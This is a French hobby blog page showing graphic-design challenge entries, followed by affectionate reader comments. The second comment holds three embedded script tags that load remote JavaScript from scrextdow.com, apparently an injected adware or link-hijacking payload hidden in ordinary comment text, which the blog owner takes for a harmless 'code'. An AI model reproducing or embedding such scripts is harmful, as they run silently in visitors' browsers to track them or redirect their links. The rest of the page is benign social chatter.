• Créas du 9 Juillet

    * Mes Effets *77 ème défi:La petite rêveuse77 ème défi:La petite rêveuse.Merci ma tite Lara chérie*77 ème défi:La petite rêveuse.Merci ma tite Manik superbe! ma  chérie*Je ratrappe les défis en absence vacances , Je ratrappe les défis en absence vacances , Je ratrappe les défis en absence vacances , Je ratrappe les défis en absence vacances , Je ratrappe les défis en absence vacances , Savane


  • Commentaires

    1
    Lundi 9 Juillet 2018 à 13:41

    Bravo ma Scarlett une belle page de chez beauty

    bravo les artistes bisou mon amie passe une bonne semaine ,

    moins chaud chez moi enfin respirable bisou ,

     

    2
    Mardi 10 Juillet 2018 à 11:16

    Coucou ma Scarlette ,

    belle série de chez beauty un beau défi

    bisou mon amie passe une bonne journée ,

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>
    3
    Mardi 10 Juillet 2018 à 11:30

    Merci  ma Belle Gazelle..Vais  voir  ce  que  donne  ton  code!!!Tu  t'es  un  peu  reposée???

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :